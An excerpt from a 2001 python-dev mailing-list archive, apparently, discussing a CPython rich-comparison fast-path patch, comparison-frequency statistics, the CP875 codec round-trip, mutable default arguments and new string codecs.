diff -c -r2.131 object.c
*** object.c	2001/05/11 03:36:45	2.131
--- object.c	2001/05/15 23:39:24
***************
*** 835,841 ****
  		}
  	}
  	else {
! 		res = do_richcmp(v, w, op);
  	}
  	compare_nesting--;
  	return res;
--- 835,863 ----
  		}
  	}
  	else {
! 		cmpfunc f;
! 		if (v->ob_type == w->ob_type
! 		    && RICHCOMPARE(v->ob_type) == NULL
! 		    && (f = v->ob_type->tp_compare) != NULL)
! 		{
! 			int c = (*f)(v, w);
! 			if (c < 0 && PyErr_Occurred())
! 				res = NULL;
! 			else {
! 				switch (op) {
! 					case Py_LT: c = c <  0; break;
! 					case Py_LE: c = c <= 0; break;
! 					case Py_EQ: c = c == 0; break;
! 					case Py_NE: c = c != 0; break;
! 					case Py_GT: c = c >  0; break;
! 					case Py_GE: c = c >= 0; break;
! 				}
! 				res = c ? Py_True : Py_False;
! 				Py_INCREF(res);
! 			}
! 		}
! 		else
! 			res = do_richcmp(v, w, op);
  	}
  	compare_nesting--;
  	return res;

That's a local change to PyObject_RichCompare, taking a fast path for most
scalar types (which don't have richcmps but do have tp_compare today).  On my
Win98 box reproducible timings are impossible, but it obviously chops out
layers and layers of function calls and redundant tests when it triggers.
That appears to be more often than not across all apps I've tried, from 60%
of PyObject_RichCompare calls to nearly 100%.


From tim.one at home.com  Wed May 16 02:01:05 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 15 May 2001 20:01:05 -0400
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49
In-Reply-To: <200105152136.QAA00489@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEGMKCAA.tim.one@home.com>

[Tim]
> BUG ALERT:  The tuple (and list) richcmp algorithm is arguably wrong,
> because it won't believe there's any difference unless Py_EQ
> returns false for some corresponding elements:
>
> >>> class C:
> ...     def __lt__(x, y): return 1
> ...     __eq__ = __lt__
> ...
> >>> C() < C()
> 1
> >>> (C(),) < (C(),)
> 0
> >>>
>
> That doesn't make sense -- provided you believe the defn. of C
> makes sense.

[Guido]
> I think in this example the problem is with C, not with the tuple
> algorithm.

I can live with that.

> The question is, what are you going to do otherwise?  You
> could test for < first, == second -- but that means twice as many
> comparisons, and for reasonably-behaved items it makes no difference
> at all.

The question remaining is how much of this list/tuple richcmp behavior is
guaranteed by the language and how much is just implementation-dependent
fuzz.

For a more vanilla example, I removed the EQ/NE "lengths differ?" tuple
richcmp early-exit test because I never found code that made it trigger. (but
tons of code that gets there without triggering).  But this has semantic
implications too:  an implementation without the early exit may call
user-defined comparison routines that raise exceptions when comparing tuples
of different lengths now.  Do you care?  (I don't.)


From tim.one at home.com  Wed May 16 02:37:56 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 15 May 2001 20:37:56 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEGMKCAA.tim.one@home.com>

[Martin v. Loewis]
> ...
> I'd like to add another data point, answering the question what types
> are most frequently compared.

That varies wildly by app.  I have apps where int compares *overwhelmingly*
dominate, others where float compares do, many where strings compares do, and
the last code I wrote for Zope spends most of its (very substantial) time
doing lookups of "object ids" in dicts.  In Python terms, those are Pythong
lon (unbounded) ints today, and potentially Python ints on 64-bit boxes, and
that's another case where ceval.c's special-casing of int compares is
impotent.

Heck, sort a large homogeneous array once, and whatever element type that
array has will likely dominate comparisons for the whole app!

That's why I'm so keen to chop out a half dozen layers of blubber for *all*
types that don't play the richcmp game (which today includes every type I
mentioned above).

> The first set of data is for running the Python testsuite.
>
> riches      3040952  # Calls to PyType_RichCompare
> eqs         2828345  # Calls where the types are equal
>
> String      2323122
> Float        141507
> Int          125187
> Type          99477
> Tuple         84503
> Long          30325
> Unicode       10782
> Instance       9335
> List           2997
> None            383
> Class           318
> Complex         219
> Dict             57
> Array            49
> WeakRef          34
> Function         11
> File             11
> SRE_Pattern      10
> CFunction         9
> Lock              8
> Module            1
>
> So strings cover 82% of all the compare calls of equally-typed
> objects, followed by floats with 5%. Those calls together cover 93% of
> the richcompare calls.
>
> Since this might give a blurred view of what is actually used in
> applications,

Note that the top 4 types don't have a tp_richcompare slot today.  The tuples
are likely composed of simple scalar types, and the latter benefit too.  But
as above, we can't say anything in advance about the *specific* types a given
app is going to compare most often.  There is no "typical app" in that
respect.

> I ran the PyXML testsuite with that python binary
> also. Leaving out types that are not used, I get
>
> riches        88465
> eqs           59279
>
> String        48097
> Int            5681
> Type           3170
> Tuple           760
> List            492
> Float           332
> Instance        269
> Unicode         243
> None            225
> SRE_Pattern       4
> Long              3
> Complex           3
>
> The first observation here is that "only" 67% of the calls are with
> equally-typed objects.

Someone who cares about the speed of PyXML would be well advised to figure
out why <0.9 wink>:  there's no scheme on the horizon that will speed
mixed-type comparisons one whit.

> Of those, 80% are with strings, 9% with integers.

XML is a string-crunching app, right?

> The last example is idle, where I just did an "import httplib", for
> fun.
>
> riches        50923
> eqs           49882
>
> String        31198
> Tuple          8312
> Type           7978
> Int            1456
> None            600
> SRE_Pattern     210
> List            122
> Instance          4
> Float             1
> Instance method   1
>
> Roughly the same picture: 97% calls with equally-typed objects, of
> those 62% strings, 3% integers. Notice the 15% for tuples and types,
> each.

Surprising!

> So to speed-up the common case clearly means to speed-up string
> comparisons.

The only thing the apps I've tried have in common is that the types compared
most often do have tp_compare but not tp_richcompare functions.  The test
suite, XML and IDLE are all heavy string-slingers.

> If I'd need to optimize anything else afterwards, I'd look into type
> objects - most likely, they are compared for EQ, which can be done
> nicely and directly in a tp_richcompare also.

Would do just as well to give them a one-liner tp_compare function (in
conjunction with the posted patch).

> Those two optimizations together would give a richcompare to 95% of
> the objects in the IDLE case.

Since that's the exact opposite of what I want to do, it's at least
interesting <wink>.  Whatever, there needs to be a (very) fast path, and it
needs to pick on something that all common types implement, including at
least strings, ints, longs, floats and-- I guess --type objects.

I don't know about other people, but I have lots of code that uses the cmp()
function heavily.  That path has also gotten bloated, and tries each of
Py_EQ, Py_LT and Py_GT in turn now, hoping for *one* of them to say "yes".
It does this now even if the tp_compare slot is defined.  The only thing
that's saving cmp()-slinging code from major sloth now is that the basic
types do *not* implement tp_richcompare, so try_rich_to_3way_compare gets out
early (before doing the three-way Py_EQ etc dance).  But give the basic
scalar types richcmp functions, and cmp() will slow down a lot (unless more
hacks are added to stop that).


From greg at cosc.canterbury.ac.nz  Wed May 16 03:58:05 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Wed, 16 May 2001 13:58:05 +1200 (NZST)
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCOEGMKCAA.tim.one@home.com>
Message-ID: <200105160158.NAA18339@s454.cosc.canterbury.ac.nz>

Tim Peters <tim.one at home.com>:

> In Python terms, those are Pythong lon (unbounded) ints today
                             ^^^^^^^
What Pythonistas wear on their feet?

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From esr at thyrsus.com  Wed May 16 04:27:38 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Tue, 15 May 2001 22:27:38 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105160158.NAA18339@s454.cosc.canterbury.ac.nz>; from greg@cosc.canterbury.ac.nz on Wed, May 16, 2001 at 01:58:05PM +1200
References: <LNBBLJKPBEHFEDALKOLCOEGMKCAA.tim.one@home.com> <200105160158.NAA18339@s454.cosc.canterbury.ac.nz>
Message-ID: <20010515222738.A9996@thyrsus.com>

Greg Ewing <greg at cosc.canterbury.ac.nz>:
> Tim Peters <tim.one at home.com>:
> 
> > In Python terms, those are Pythong lon (unbounded) ints today
>                              ^^^^^^^
> What Pythonistas wear on their feet?

No, man.  It's what sexy lady Pythonistas wear on the beach in Rio.

(Yes, I know some sexy lady Pythonistas.  No, you can't have their
phone numbers.  Pthfthfthpht...)
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

Question with boldness even the existence of a God; because, if there
be one, he must more approve the homage of reason, than that of
blindfolded fear.... Do not be frightened from this inquiry from any
fear of its consequences. If it ends in the belief that there is no
God, you will find incitements to virtue in the comfort and
pleasantness you feel in its exercise...
	-- Thomas Jefferson, in a 1787 letter to his nephew


From tim.one at home.com  Wed May 16 09:14:25 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 16 May 2001 03:14:25 -0400
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
In-Reply-To: <3B00E98E.1C44FF5@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEHLKCAA.tim.one@home.com>

[MAL]
> Round-tripping is obviously very important if you use Unicode
> as basis for working on text.

Since I use 7-bit ASCII exclusively, I've been using

    encode = decode = lambda x: x

I haven't proved that's round-trippable, but haven't bumped into an exception
yet.

> I don't know about the reasoning behind making cp875 fail the
> round-trip -- Unicode certainly provides means to make mappings
> round-trip safe (e.g. by reverting to the private Unicode
> char. point areas).

Then I ignorantly but confidently (indeed, with the cheery confidence only
the truly ignorant can truly enjoy!) vote for your approach that maps the
non-round-trippable cp875 code points to None.  Better safe than sorry, by
default.  Else 6 of the 7 ambiguous chars will be silent surprises by
default.


From tim.one at home.com  Wed May 16 09:25:28 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 16 May 2001 03:25:28 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105151527.KAA28734@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEHLKCAA.tim.one@home.com>

[Guido]
> PEP 207 is quite explicit that == and != are not to be assumed each
> other's complement.  It is silent on the x==x issue but the PEP
> mentions IEEE 754 so I agree that this also shouldn't be cut short.

It's explicit about x==x too:

    (Note: Python currently assumes that x==x is always true
    and x!=x is never true; this should not be assumed.)

That's from the end of point #4, under "Proposed Resolutions".  I agreed
then, and still do <wink>.


From martin at loewis.home.cs.tu-berlin.de  Wed May 16 09:28:45 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Wed, 16 May 2001 09:28:45 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <15105.26334.610144.846269@slothrop.digicool.com> (message from
	Jeremy Hylton on Tue, 15 May 2001 13:26:54 -0400 (EDT))
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
	<200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
	<200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.26334.610144.846269@slothrop.digicool.com>
Message-ID: <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de>

> Sounds like we ought to do a search-and-destroy on type comparisons,
> replacing with isinstance() where possible.

At least in my applications, this is unfortunately not possible: I
want a test for byte-string-or-unicode-string. This could be done with
two isinstance calls, but that is certainly less efficient.

Marc-Andre once proposed a type representing the immediate supertype
of both byte strings and unicode strings; let's call it abstract string.
Then I could write isinstance(e, types.AbstractString).

Regards,
Martin


From martin at loewis.home.cs.tu-berlin.de  Wed May 16 09:24:56 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Wed, 16 May 2001 09:24:56 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <15105.42180.401918.223487@anthem.wooz.org> (barry@digicool.com)
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
	<200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
	<200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.42180.401918.223487@anthem.wooz.org>
Message-ID: <200105160724.f4G7OuF01764@mira.informatik.hu-berlin.de>

>     GvR> I'm curious where the frequent comparisons of types come
>     GvR> from.
> 
> Not to mention the several hundred comparisons to None.

This is harder to analyse; I set a gdb breakpoint on the place where
RichCompare gets PyType_Type, then tried to see what it does, then
ignoring the breakpoint a few times. This is what I've found; I may
miss important cases.

In PyXML, the expression

   type(e) in [types.StringType, types.UnicodeType]

is frequently computed. This is a sequence_contains, which in turn does two
Py_EQ tests. In addition, compile.c:com_add has

   t = Py_BuildValue("(OO)", v, v->ob_type)
   PyDict_GetItem(dict, t)

Again, the dictionary lookup performs Py_EQ on the tuples, which does
Py_EQ on the elements.

This also accounts for the RichCompare calls which receive None: v may
be None, here, so t is (None, type(None)).

In IDLE, the situation is similar. com_add produces many compares with
types. In addition, sre.compile has

   type(s) in sre_compile.STRING_TYPES

which is the same test as the PyXML one. Finally, there is a
type-in-typetuple test inside Tkinter._cnfmerge.

Regards,
Martin


From i_sofer at yahoo.com  Wed May 16 09:53:25 2001
From: i_sofer at yahoo.com (Idan Sofer)
Date: 16 May 2001 10:53:25 +0300
Subject: [Python-Dev] Bug report: empty dictionary as default class argument
Message-ID: <200105160756.KAA29616@alpha.netvision.net.il>

Hello.

I have found a rather annoying bug in Python, present in both Python 1.5
and Python 2.0.

If a class has an argument with a default of an empty dictionary, then
all instances of the same class will point to the same dictionary,
unless the dictionary is explictly defined by the constructor.

I attach a piece of code that demostrates the problem
-------------- next part --------------
A non-text attachment was scrubbed...
Name: test.py
Type: text/x-python
Size: 1197 bytes
Desc: not available
URL: <http://mail.python.org/pipermail/python-dev/attachments/20010516/15c1b25b/attachment.py>

From martin at loewis.home.cs.tu-berlin.de  Wed May 16 10:02:01 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Wed, 16 May 2001 10:02:01 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCOEGMKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCOEGMKCAA.tim.one@home.com>
Message-ID: <200105160802.f4G821s02180@mira.informatik.hu-berlin.de>

> Since that's the exact opposite of what I want to do, it's at least
> interesting <wink>.

I'll put a patch on SF soon which does what you want to do, i.e. tries
tp_compare as the first thing if tp_richcompare is not there. Even
with this patch, your code is faster if strings have a
richcompare. Without richcompare, I get

0.720
0.720
0.720
0.730
0.720
0.720
0.730
0.720
0.720
0.730

With it, I get

0.710
0.720
0.720
0.710
0.710
0.720
0.710
0.710
0.710
0.720

Given that stock CVS python is in the 0.78 range, the different is
neglectable, though.

Regards,
Martin


From larsga at garshol.priv.no  Wed May 16 10:19:10 2001
From: larsga at garshol.priv.no (Lars Marius Garshol)
Date: 16 May 2001 10:19:10 +0200
Subject: [Python-Dev] Bug report: empty dictionary as default class argument
In-Reply-To: <200105160756.KAA29616@alpha.netvision.net.il>
References: <200105160756.KAA29616@alpha.netvision.net.il>
Message-ID: <m3sni51zb5.fsf@lambda.garshol.priv.no>

* Idan Sofer
| 
| If a class has an argument with a default of an empty dictionary,
| then all instances of the same class will point to the same
| dictionary, unless the dictionary is explictly defined by the
| constructor.

This is part of the language semantics, and so not a bug. The default
values of optional arguments are evaluated when the function/method is
compiled. You may consider the semantics ill-advised, but it is
intentional.
 
| class foo:
|     
|     def __init__(self,attribs={}):
| 	self.attribs=attribs;
| 	return None;

I usually write this as:

class Foo:

  def __init__(self, attribs = None):
    self.attribs = attribs or {}

--Lars M.


From fredrik at pythonware.com  Wed May 16 10:18:44 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Wed, 16 May 2001 10:18:44 +0200
Subject: [Python-Dev] Bug report: empty dictionary as default class argument
References: <200105160756.KAA29616@alpha.netvision.net.il>
Message-ID: <011401c0dde0$d4adb2e0$0900a8c0@spiff>

Idan Sofer wrote:
>
> I have found a rather annoying bug in Python, present in both Python 1.5
> and Python 2.0.
>
> If a class has an argument with a default of an empty dictionary, then
> all instances of the same class will point to the same dictionary,
> unless the dictionary is explictly defined by the constructor.

maybe you should check the documentation (or the FAQ) before
submitting bugs?

    http://www.python.org/doc/current/ref/function.html

    Default parameter values are evaluated when the function
    definition is executed. This means that the expression is evaluated
    once, when the function is defined, and that that same ``pre-
    computed'' value is used for each call. This is especially important
    to understand when a default parameter is a mutable object,
    such as a list or a dictionary: if the function modifies the object
    (e.g. by appending an item to a list), the default value is in
    effect modified.

Cheers /F

PS. when you do report real bugs, please use the bug tracker:

    http://sourceforge.net/tracker/?group_id=5470&atid=105470

"is this a bug" questions should be sent to comp.lang.python


From tim.one at home.com  Wed May 16 10:41:47 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 16 May 2001 04:41:47 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105151945.f4FJjxM02351@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEHOKCAA.tim.one@home.com>

[Martin]
> Producing numbers is easy :-)

If only making sense of them were too <0.6 wink>.

> I've instrumented my version where string implements richcmp, and
> special-cases everything I can think of.

1. String objects are also equal despite being different objects,
   if their ob_sinterned pointers are equal and non-NULL.  So if
   you're looking for every trick in & out of the book, that's
   another one.

2. But the real goal is to add only those special cases that in
   combination yield the largest net win, and that's much harder
   to determine (since there are no typical apps, and it's very
   hard to quantify the tradeoffs here in a credible x-platform
   x-app way).

> Counting is done for running the test suite. With this, I get
>
> Calls to string_richcompare:   2378660
> Calls with different types:      33992 (ie. one is not a string)
> Calls with identical strings:   120517
> Calls where lens decide !EQ:   1775716
> ----------------------------
> Calls richcmp -> oldcomp:       448435
> Total calls to oldcomp:        1225643
> Calls oldcomp -> memcmp:        860174
>
> So 5% of the calls are with identical strings, for which I can
> immediately decide the outcome.

But also at the cost of doing a fruitless compare and branch in 95% of calls.
There isn't enough data to guess whether this is a net win or a net loss
(compared to leaving this special case out).

Note that if the "identical string pointers" special case is a net win, it
would be effective inside oldcomp instead (i.e., you don't need a richcompare
slot to exploit it); indeed, it may be more effective there, since there are
some 800,000 calls to oldcmp that *didn't* come from richcmp, and oldcmp
doesn't check for pointer equality now (but PyObject_Compare does, so there
didn't *used* to be any point to it in oldcmp).

Any idea where those 800,000 virgin calls to oldcomp are coming from?  That's
a lot.

> 75% can be decided in terms of the string lengths, which leaves ca. 19%
> for cases where lexicographical comparison is needed.

So about 1 in 5 times there's also the additional (wrt just calling oldcmp
all the time) overhead of a second function call (i.e., the call to oldcmp
made by richcmp).

> In those cases, the first byte decides in 30%. If I remove the test
> for "len decides !EQ", I get
>
> #riches:                       2358322
> #riches_ni:                      34108
> #idents_decide:                 102050
> #lens_decide:                        0
> --------------------------------------
> rest(computed):                2222164
> #comps:                        2949421
> #memcmps:                       917776
>
> So still, ca. 30% can be decided by first byte.

Sorry, I couldn't follow this part, except noting that 917776 is about 30% of
2949421, in which case I would have expected you to say that 70% can be
decided by first byte.

> It still appears that the total number of calls to memcmp is higher
> when the length is not taken into consideration.

Since 917776 is larger than the earlier 860174, isn't that plain?  BTW, some
compilers inline memcmp, so assuming it's "a call" is a x-platform trap; of
course assuming it *isn't* is also a x-platform trap.

> To verify this claim, I've counted the cases where the length
> decides the outcome, but looking at the first byte also had:
>
> lens_decide:                    1784897
> lens_decide_firstbyte_wouldhave:1671148
>
> So in 6% of the cases, checking the length alone gives a decision
> which looking at the first byte doesn't; plus it saves a function
> call.

OTOH, 19% of all richcmp calls ended up calling oldcmp too, so the *net*
effect is muddy at best.

> To support the thesis that Py_EQ is the common case for strings, I
> counted the various operations:
>
> pyEQ:2271593
> pyLE:9234
> pyGE:0
> pyNE:20470
> pyLT:22765
> pyGT:578

This clearly wasn't doing much sorting of strings (or of tuples containing
strings, etc) -- .sort() never uses pyEQ (it only uses pyLT).

> Now, that might be flawed since comparing strings for equal is
> extremely frequent in the testsuite. To give more credibility to the
> data, I also ran setup.py with my instrumented ./python:

In the absence of non-trivial use of sorting or the bisect module or one of
the search tree modules out there, it's easy to buy that PyEQ is most common
for strings.  What's not clear is that adding a rich comparison slot actually
helps overall (as compared to continuing to let string_compare() handle it,
and if the pointer equality test actually saves more than it costs, adding it
there instead).  It's clearer that this is going to hurt sorting (& bisect
etc), by adding yet another layer of function call to get Py_LT resolved (as
for dict compares too, the string richcmp can't do anything to speed up Py_LT
that string oldcmp can't do just as efficiently -- indeed, that's the great
advantage oldcmp's "compare first character" test had:  that *can* decide
Py_LT in one byte much of the time (but length comparison cannot)).

Note too earlier mail about how adding a richcmp slot to strings will
suddenly slow cmp(string1, string2) (which is the usual way to program a
search tree, because cmp() *used* to call a string comparison routine only
once; but after adding a richcmp slot, each cmp(string1, string2) will call
the richcmp slot from 1 thru 3 times (data-dependent)).

> ...
> That shows that optimizing for Py_NE is not worth it. With these data,
> I'll upload a patch to SF.

Which is here:

http://sourceforge.net/tracker/index.php?func=detail&aid=424335&
    group_id=5470&atid=305470

Heh:  let's grab all the ugly URLs off of SourceForge, stick them in a giant
list, and sort them.  Can't think of a more typical app than that <wink>.

Thanks for the work, Martin!


From tim.one at home.com  Wed May 16 10:51:17 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 16 May 2001 04:51:17 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <15105.46090.203278.397835@anthem.wooz.org>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEHPKCAA.tim.one@home.com>

[Barry A. Warsaw]
> ...
> from types import StringType
> import time
> r = range(1000000)
>
> def one(r=r):
>     x = 'hello'
>     t0 = time.time()
>     for i in r:

Random clue:  when you're too lazy to try to subtact out loop overhead (not a
knock, I am too), you may have better luck with

    r = [1] * 1000000

than

    r = range(1000000)

The reason is that the former way gets to keep incref'ing and decref'ing a
single object (as it's repeatedly bound to "i" across iterations), instead of
slobbering all over memory inc'ing and dec'ing a million distinct objects.

there's-as-an-art-to-doing-nothing-quickly-ly y'rs  - tim


From tim.one at home.com  Wed May 16 10:56:56 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 16 May 2001 04:56:56 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <20010515222738.A9996@thyrsus.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEHPKCAA.tim.one@home.com>

[poor Tim]
> In Python terms, those are Pythong lon (unbounded) ints today
                             ^^^^^^^
[Greg Ewing]
> What Pythonistas wear on their feet?

[Eric S. Raymond]
> No, man.  It's what sexy lady Pythonistas wear on the beach in Rio.

Eric wins!  That's indeed what I was thinking of.  I'm surprised nobody asked
what a lon was.  But not as surprised that I didn't try to blame this on a
Outlook 2000 bug.

> (Yes, I know some sexy lady Pythonistas.  No, you can't have their
> phone numbers.  Pthfthfthpht...)

Too much work anyway.  They can have mine:  703 758 8258.

but-they-better-*really*-love-python-cuz-i-give-quizzes-ly y'rs  - tim


From esr at thyrsus.com  Wed May 16 11:17:09 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 16 May 2001 05:17:09 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEHPKCAA.tim.one@home.com>; from tim.one@home.com on Wed, May 16, 2001 at 04:56:56AM -0400
References: <20010515222738.A9996@thyrsus.com> <LNBBLJKPBEHFEDALKOLCKEHPKCAA.tim.one@home.com>
Message-ID: <20010516051709.C11602@thyrsus.com>

Tim Peters <tim.one at home.com>:
> [poor Tim]
> > In Python terms, those are Pythong lon (unbounded) ints today
>                              ^^^^^^^
> [Greg Ewing]
> > What Pythonistas wear on their feet?
> 
> [Eric S. Raymond]
> > No, man.  It's what sexy lady Pythonistas wear on the beach in Rio.
> 
> Eric wins!  That's indeed what I was thinking of.  I'm surprised nobody asked
> what a lon was.  But not as surprised that I didn't try to blame this on a
> Outlook 2000 bug.
> 
> > (Yes, I know some sexy lady Pythonistas.  No, you can't have their
> > phone numbers.  Pthfthfthpht...)
> 
> Too much work anyway.  They can have mine:  703 758 8258.

Hmmm...now, which one of them should I try to talk into a snakeskin bikini?

Duh.  Answer obvious: the one I can talk *out* of a snakeskin bikini most 
rapidly afterwards.  Then I'll give her your number -- that is, if
I don't get too, er, distracted.

	seeming-like-a-good-time-to-practice-my-Timlike-wink'ly yours,
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

Every Communist must grasp the truth, 'Political power grows out of
the barrel of a gun.'
        -- Mao Tse-tung, 1938, inadvertently endorsing the Second Amendment.


From mal at lemburg.com  Wed May 16 11:29:49 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 16 May 2001 11:29:49 +0200
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
References: <LNBBLJKPBEHFEDALKOLCGEHLKCAA.tim.one@home.com>
Message-ID: <3B02488D.415BA95F@lemburg.com>

Tim Peters wrote:
> 
> [MAL]
> > Round-tripping is obviously very important if you use Unicode
> > as basis for working on text.
> 
> Since I use 7-bit ASCII exclusively, I've been using
> 
>     encode = decode = lambda x: x
> 
> I haven't proved that's round-trippable, but haven't bumped into an exception
> yet.

For character map codecs the complete range(256) of possible
input characters should pass the round-trip test, that is

	encoded text -> Unicode -> encoded text

should result in the identiy mapping for all c in map(chr,range(256)).
 
> > I don't know about the reasoning behind making cp875 fail the
> > round-trip -- Unicode certainly provides means to make mappings
> > round-trip safe (e.g. by reverting to the private Unicode
> > char. point areas).
> 
> Then I ignorantly but confidently (indeed, with the cheery confidence only
> the truly ignorant can truly enjoy!) vote for your approach that maps the
> non-round-trippable cp875 code points to None.  Better safe than sorry, by
> default.  Else 6 of the 7 ambiguous chars will be silent surprises by
> default.

I will check in a patch which moves the building logic for encoding
maps to codecs.py. This will simplify the task of choosing the
"right" solution. Currently I'm in favour of:

def make_encoding_map(decoding_map):

    """ Creates an encoding map from a decoding map.

        If a target mapping in the decoding map occurrs multiple
        times, then that target is mapped to None (undefined mapping),
        causing an exception when encountered by the charmap codec
        during translation.

        One example where this happens is cp875.py which decodes
        multiple character to \u001a.

    """
    m = {}
    for k,v in decoding_map.items():
        if not m.has_key(v):
            m[v] = k
        else:
            m[v] = None
    return m

Perhaps we should also have a codecs.finalize_decoding_map() API
in codecs.py which checks the decoding map and postprocesses
it in case it finds a problem ?!

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Wed May 16 11:32:36 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 16 May 2001 11:32:36 +0200
Subject: [Python-Dev] Comparison speed
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
		<200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
		<200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.26334.610144.846269@slothrop.digicool.com> <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de>
Message-ID: <3B024934.58232325@lemburg.com>

"Martin v. Loewis" wrote:
> 
> > Sounds like we ought to do a search-and-destroy on type comparisons,
> > replacing with isinstance() where possible.
> 
> At least in my applications, this is unfortunately not possible: I
> want a test for byte-string-or-unicode-string. This could be done with
> two isinstance calls, but that is certainly less efficient.
> 
> Marc-Andre once proposed a type representing the immediate supertype
> of both byte strings and unicode strings; let's call it abstract string.
> Then I could write isinstance(e, types.AbstractString).

I'm still holding on to that idea... hopefully, Guido's type
checkins will make this possible in 2.2 or 2.3. The same
should then be done for numbers, sequences and mappings (all
abstract "types" defined in abstract.c).

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Wed May 16 11:34:40 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 16 May 2001 11:34:40 +0200
Subject: [Python-Dev] Comparison speed
References: <LNBBLJKPBEHFEDALKOLCEEHOKCAA.tim.one@home.com>
Message-ID: <3B0249B0.5DD10A4C@lemburg.com>

Tim Peters wrote:
> 
> [Martin]
> > Producing numbers is easy :-)
> 
> If only making sense of them were too <0.6 wink>.

FYI, I've added a few compare tests to pybench which now is
available as version 0.9. You can download it from my Python
page.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mwh at python.net  Wed May 16 12:53:16 2001
From: mwh at python.net (Michael Hudson)
Date: 16 May 2001 11:53:16 +0100
Subject: [Python-Dev] Easy codec access
In-Reply-To: Guido van Rossum's message of "Tue, 15 May 2001 11:35:09 -0500"
References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com>
Message-ID: <m31yppo99f.fsf@atrus.jesus.cam.ac.uk>

Guido van Rossum <guido at digicool.com> writes:

> > I've just checked in a set of patches which implement the new
> > .decode() method along with a couple of useful codecs.
> 
> Cool!

Indeed.  Good idea, Marc!

This is a bit unfriendly though:

>>> "bobbins".encode("gzip")
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
  File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function
    raise SystemError,\
SystemError: module "encodings.gzip" failed to register

I thought SystemErrors shouldn't ever happen (isn't it what gets
raised for an illegal opcode, for example?).
 
> > To see just how easy it is to write codecs, please have
> > a look at the string codecs I added in this patch (e.g.
> > zlib_codec.py or hex_codec.py). I am pretty sure that there
> > are a lot more useful things in the standard lib which could
> > benefit from these easy-to-use interfaces.
> 
> As an excercise, I added a quoted-printable codec.  It was easy
> indeed!

urlencode would be nice.  Maybe re.escape, too.  html entities?
That's probably a bigger can of worms, but 

print "<p>%s</p>"%text.encode("html")

seems delightfully simpleminded.

Cheers,
M.

-- 
  GAG: I think this is perfectly normal behaviour for a Vogon. ...
VOGON: That is exactly what you always say.
  GAG: Well, I think that is probably perfectly normal behaviour for a
      psychiatrist. -- The Hitch-Hikers Guide to the Galaxy, Episode 9


From mal at lemburg.com  Wed May 16 13:06:14 2001
